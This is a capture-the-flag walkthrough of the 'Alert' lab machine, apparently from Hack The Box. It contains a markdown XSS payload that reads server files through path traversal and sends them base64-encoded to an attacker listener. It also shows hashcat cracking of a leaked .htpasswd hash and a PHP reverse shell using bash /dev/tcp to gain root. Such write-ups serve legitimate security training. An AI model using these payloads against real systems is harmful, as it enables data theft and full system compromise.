Alert

Synopsis

Alert is a easy linux machine created by FisMatHack. The md file is vulnerable to XSS and through contact form the Arbitrary File Read is performed. The hash of albert is found in one of the file. SSH into alber and pillaging reveals that the php server running at port 8080. The reverse shell php script is created and port 8080 is forwarded. The root shell is gained using nc and visiting the malicious php script.

OS	Difficulty	Points	Release Date	Retired Date
Linux	Easy	20	23-11-2024	22-03-2025

---

Enumeration

Nmap

Starting the nmap scan and found ssh and http services running.

nmap -Pn -sC -sV --min-rate=1000 10.10.11.44                                                                                                                             
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 10:49 GMT                                                                                                              
Nmap scan report for 10.10.11.44
Host is up (0.97s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.56 seconds

Add alert.htb in /etc/hosts file.

Web - alert.htb

Alert website is a markdown viewer, where we have to uplaod the markdown file and we see the markdown.

The Contact Us page has a form to write message and send it. The About Us has a message saying that the administrator reviews the contact messages.

Searching the web for md files vulnerabilities, one of the hacktricks page contains the XSS vulnerability which is used in md files. Trying the first XSS payload form hacktricks gives us the alert, which confirms the XSS vulnerability in md files.

Directory fuzzing reveals some of the hidden paths.

feroxbuster -u http://alert.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x php
                                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://alert.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      182l      385w     3622c http://alert.htb/css/style.css
302      GET       23l       48w      660c http://alert.htb/index.php => index.php?page=alert
302      GET       23l       48w      660c http://alert.htb/ => index.php?page=alert
200      GET        1l        3w       24c http://alert.htb/contact.php
301      GET        9l       28w      304c http://alert.htb/css => http://alert.htb/css/
301      GET        9l       28w      309c http://alert.htb/messages => http://alert.htb/messages/
200      GET        1l        0w        1c http://alert.htb/messages.php
301      GET        9l       28w      308c http://alert.htb/uploads => http://alert.htb/uploads/
200      GET      182l      385w     3622c http://alert.htb/css/style
[####################] - 4m     18989/18989   0s      found:9       errors:106    
[####################] - 2m      4745/4745    36/s    http://alert.htb/ 
[####################] - 2m      4745/4745    39/s    http://alert.htb/css/ 
[####################] - 2m      4745/4745    38/s    http://alert.htb/messages/ 
[####################] - 2m      4745/4745    40/s    http://alert.htb/uploads/ 

The messages gives the forbidden and messages.php has a blank page.

---

Foothold

Shell - albert [ Arbitrary File Read via XSS ]

Clicking Share Markdown button at the bottom right corner of the page gives us the http://alert.htb/visualizer.php?link_share=67e02ea9ea5471.39498561.md link to share the md file.

Exploit

Creating the malicious md file to read the files, and sharing the md file. The link is send via message in contact us to administrator and we will get to read the file.

1

Creating malicious md file

Adding the below script in payload.md file for checking Arbitrary File Read.

payload.md

<script>
    var req = new XMLHttpRequest();
    req.open('GET', 'http://alert.htb/messages.php', false);
    req.send();
    var req2 = new XMLHttpRequest();
    req2.open('GET', 'http://10.10.16.55:8000/?content=' + btoa(req.responseText), true);
    req2.send();
</script>

2

Uploading and sharing the md file

Open the python server. Upload and share the md file. Paste the link in the contact us message input.

3

Decoding the base64

echo 'PGgxPk1lc3NhZ2VzPC9oMT48dWw+PGxpPjxhIGhyZWY9J21lc3NhZ2VzLnBocD9maWxlPTIwMjQtMDMtMTBfMTUtNDgtMzQudHh0Jz4yMDI0LTAzLTEwXzE1LTQ4LTM0LnR4dDwvYT48L2xpPjwvdWw+Cg==' | base64 -d
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

4

Reading config file

Reading the apache config file via Arbitrary File Read vulnerability.

payload.md

<script>
    var req = new XMLHttpRequest();
    req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
    req.send();
    var req2 = new XMLHttpRequest();
    req2.open('GET', 'http://10.10.16.55:8000/?content=' + btoa(req.responseText), true);
    req2.send();
</script>

Repeat step 3.

5

Getting hash

<pre><VirtualHost *:80>
    ServerName alert.htb

    DocumentRoot /var/www/alert.htb

    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb

    DocumentRoot /var/www/statistics.alert.htb

    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        
        Require valid-user
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

</pre>

The /var/www/statistics.alert.htb/.htpasswd file contains the user authentication credentials. Repeat the above steps to get the file.

<pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/</pre>

6

Cracking the hash

hashcat -a 0 hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:    
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
Time.Started.....: Mon Mar 24 06:42:43 2025 (0 secs)
Time.Estimated...: Mon Mar 24 06:42:43 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    16668 H/s (13.23ms) @ Accel:32 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344385 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2560/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: gators -> medicina
Hardware.Mon.#1..: Temp: 69c Util: 17%

Started: Mon Mar 24 06:42:23 2025
Stopped: Mon Mar 24 06:42:45 2025

The password gives us the ssh login as albert.

ssh albert@10.10.11.44                    
albert@10.10.11.44's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Mon 24 Mar 2025 10:45:08 AM UTC

  System load:           0.07
  Usage of /:            65.4% of 5.03GB
  Memory usage:          13%
  Swap usage:            0%
  Processes:             236
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.44
  IPv6 address for eth0: dead:beef::250:56ff:fe94:caaa


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Mar 24 10:37:23 2025 from 10.10.16.124
albert@alert:~$ 

The user.txt file contains the user flag 👏

---

Privilege Escalation

Pillaging - albert [ user ]

The netstat reveals that the tcp port 8080 is open.

albert@alert:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
albert@alert:~$ 

The ps aux command reveals that the root is running php web-server in port 8080 and serving the files from /opt/website-monitor directory.

albert@alert:~$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 167960 11448 ?        Ss   08:34   0:02 /sbin/init maybe-ubiquity
root           2  0.0  0.0      0     0 ?        S    08:34   0:00 [kthreadd]
----- SNIP -----
syslog       754  0.0  0.1 224344  5340 ?        Ssl  08:34   0:00 /usr/sbin/rsyslogd -n -iNONE
root         757  0.0  0.1  17364  7948 ?        Ss   08:34   0:00 /lib/systemd/systemd-logind
root         759  0.0  0.3 393280 12024 ?        Ssl  08:34   0:00 /usr/lib/udisks2/udisksd
root         794  0.0  0.2 241372 11144 ?        Ssl  08:34   0:00 /usr/sbin/ModemManager
root        1001  0.0  0.0   6816  2932 ?        Ss   08:34   0:00 /usr/sbin/cron -f
root        1012  0.0  0.6 281068 26704 ?        Ss   08:34   0:00 
root        1014  0.0  0.0   8360  3408 ?        S    08:34   0:00 /usr/sbin/CRON -f
root        1015  0.0  0.0   8360  3408 ?        S    08:34   0:00 /usr/sbin/CRON -f
root        1017  0.0  0.5 396748 21352 ?        Ssl  08:34   0:06 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
----- SNIP -----
albert     20142  0.0  0.1   8276  5104 pts/0    Ss   12:19   0:00 -bash
root       20322  0.0  0.0      0     0 ?        I    12:20   0:00 [kworker/u256:3]
root       20555  0.0  0.0   5476   516 ?        S    12:21   0:00 /usr/bin/sleep 3
albert     20556  0.0  0.0   8888  3380 pts/0    R+   12:21   0:00 ps aux
root       20557  0.0  0.0  22780  3840 ?        S    12:21   0:00 /lib/systemd/systemd-udevd
albert@alert:~$ 

Shell - root

Creating the reverse shell php file in /opt/website-monitor directory gives us the reverse shell.

1

Port Forwarding [ port 8080 ]

ssh -L 8080:127.0.0.1:8080 albert@10.10.11.44
albert@10.10.11.44's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Mon 24 Mar 2025 12:43:41 PM UTC

  System load:           0.0
  Usage of /:            65.8% of 5.03GB
  Memory usage:          13%
  Swap usage:            0%
  Processes:             237
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.44
  IPv6 address for eth0: dead:beef::250:56ff:fe94:caaa


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Mar 24 12:19:19 2025 from 10.10.16.55
albert@alert:~$ 

2

Creating the php script for reverse shell

Change Directory to /opt/website-monitor/config

<?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.55/8443 0>&1'"); ?>

3

Getting Shell

Open nc listener and visit http://localhost:8080/config/shell.php

curl http://localhost:8080/config/shell.php 

nc -lvnp 8443   
Listening on 0.0.0.0 8443
Connection received on 10.10.11.44 56194
bash: cannot set terminal process group (1012): Inappropriate ioctl for device
bash: no job control in this shell
root@alert:/opt/website-monitor/config#

The root.txt contains the root flag 🎉

---

Proof of Concept

The below video provides the PoC of Alert machine.